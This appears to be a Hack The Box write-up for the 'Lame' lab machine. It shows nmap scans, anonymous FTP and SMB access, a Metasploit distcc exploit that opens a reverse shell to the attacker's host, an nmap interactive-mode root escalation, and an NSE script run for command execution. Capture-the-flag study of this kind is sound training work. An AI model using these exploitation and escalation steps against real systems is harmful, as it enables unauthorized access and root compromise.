Hack the Box Walkthrough – LAME machine
New walkthrough today about the easy machine LAME from Hack The Box. Probably one of the easiest machine in HTB when we look at the own numbers.
Let’s jump in !
As usual we start with an nmap enumeration to see what we are dealing with.
[email protected]:~/Documents$ nmap -sC -sV -oA nmap 10.129.55.194 -p- -Pn Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-28 03:42 EST Nmap scan report for 10.129.55.194 Host is up (0.026s latency). Not shown: 65530 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server status: | Connected to 10.10.14.106 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | vsFTPd 2.3.4 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) | ssh-hostkey: | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA) |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP) 3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 2h32m53s, deviation: 3h32m10s, median: 2m51s | smb-os-discovery: | OS: Unix (Samba 3.0.20-Debian) | Computer name: lame | NetBIOS computer name: | Domain name: hackthebox.gr | FQDN: lame.hackthebox.gr |_ System time: 2020-11-28T03:47:43-05:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smb2-time: Protocol negotiation failed (SMB2) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 179.65 seconds
We see the FTP port open which allows anonymous connection – let’s have a look:
[email protected]:~/Documents$ ftp 10.129.55.194 Connected to 10.129.55.194. 220 (vsFTPd 2.3.4) Name (10.129.55.194:kali): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> dir 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. 226 Directory send OK. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. 226 Directory send OK. ftp>
We have as well a samba SMB running – let’s have a quick look:
[email protected]:~/Documents$ smbclient -L 10.129.55.194 protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED
mmk ok.. protocol negotiation failed.
A look on Google gave the solution: edit the file /etc/samba/smb.conf and add the following under the global section:
client min protocol = NT1
let’s try again:
[email protected]:~/Documents$ smbclient -L 10.129.55.194 Enter WORKGROUP\kali's password: Anonymous login successful Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers tmp Disk oh noes! opt Disk IPC$ IPC IPC Service (lame server (Samba 3.0.20-Debian)) ADMIN$ IPC IPC Service (lame server (Samba 3.0.20-Debian)) Reconnecting with SMB1 for workgroup listing. Anonymous login successful Server Comment --------- ------- Workgroup Master --------- ------- WORKGROUP LAME
Maybe something interresting in the shared tmp folder:
[email protected]:~/Documents$ smbclient --no-pass //10.129.55.194/tmp Anonymous login successful Try "help" to get a list of possible commands. smb: \> ls . D 0 Sat Nov 28 04:01:12 2020 .. DR 0 Sat Oct 31 03:33:58 2020 .ICE-unix DH 0 Sat Nov 28 03:41:15 2020 vmware-root DR 0 Sat Nov 28 03:41:38 2020 .X11-unix DH 0 Sat Nov 28 03:41:42 2020 .X0-lock HR 11 Sat Nov 28 03:41:42 2020 5581.jsvc_up R 0 Sat Nov 28 03:42:29 2020 vgauthsvclog.txt.0 R 1600 Sat Nov 28 03:41:13 2020 7282168 blocks of size 1024. 5385868 blocks available
Nope.. the shared opt folder ?
[email protected]:~/Documents$ smbclient --no-pass //10.129.55.194/opt Anonymous login successful tree connect failed: NT_STATUS_ACCESS_DENIED
Ok then we have a port 3632 opens for distcc
From wikipedia, we know that distcc is a tool for speeding up compilation of source code by using distributed computing over a computer network.
A search with searchsploit give a nice result:
let’s give a try
There are only two options to set:
I have then added a payload and configure it
time now to run our exploit :
msf6 exploit(unix/misc/distcc_exec) > exploit [*] Started reverse TCP double handler on 10.10.14.106:4444 [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo mm0VQUXWQUFfriyg; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket A [*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\n" [*] Matching... [*] B is input... [*] Command shell session 1 opened (10.10.14.106:4444 -> 10.129.31.153:38737) at 2020-11-28 08:35:44 -0500
And we have a shell !
By running a linpeas report I found out that nmap is installed and may help for our priv esc
Indeed, the nmap interactive mode can be used to execute shell command
[email protected]:/tmp$ nmap --interactive nmap --interactive Starting Nmap V. 4.53 ( http://insecure.org ) Welcome to Interactive Mode -- press h <enter> for help nmap> !sh !sh sh-3.2# whoami whoami root
And we are root !
other ways to do
I read here that we could use nmap to our foothold shell.
[email protected]:~$ sudo wget https://svn.nmap.org/nmap/scripts/distcc-cve2004-2687.nse -O /usr/share/nmap/scripts/distcc-exec.nse [sudo] password for kali: --2020-11-28 09:01:51-- https://svn.nmap.org/nmap/scripts/distcc-cve2004-2687.nse Resolving svn.nmap.org (svn.nmap.org)... 188.8.131.52, 2600:3c01:e000:3e6::6d4e:7061 Connecting to svn.nmap.org (svn.nmap.org)|184.108.40.206|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 3519 (3.4K) [text/plain] Saving to: ‘/usr/share/nmap/scripts/distcc-exec.nse’ /usr/share/nmap/scripts/distcc-exec.nse 100%[=======================================================================================================================================>] 3.44K --.-KB/s in 0s 2020-11-28 09:01:52 (128 MB/s) - ‘/usr/share/nmap/scripts/distcc-exec.nse’ saved [3519/3519]
then run the following command:
[email protected]:~$ nmap -p 3632 10.129.31.153 --script distcc-exec --script-args="distcc-exec.cmd='id'" -Pn Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-28 09:03 EST Nmap scan report for 10.129.31.153 Host is up (0.025s latency). PORT STATE SERVICE 3632/tcp open distccd | distcc-exec: | VULNERABLE: | distcc Daemon Command Execution | State: VULNERABLE (Exploitable) | IDs: CVE:CVE-2004-2687 | Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C) | Allows executing of arbitrary commands on systems running distccd 3.1 and | earlier. The vulnerability is the consequence of weak service configuration. | | Disclosure date: 2002-02-01 | Extra information: | | uid=1(daemon) gid=1(daemon) groups=1(daemon) | | References: | https://distcc.github.io/security.html | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687 |_ https://nvd.nist.gov/vuln/detail/CVE-2004-2687 Nmap done: 1 IP address (1 host up) scanned in 0.40 seconds
Then reading the HTB official write up there was a easier way to do.
They used the metasploit exploit exploit/multi/samba/usermap_script and got root directly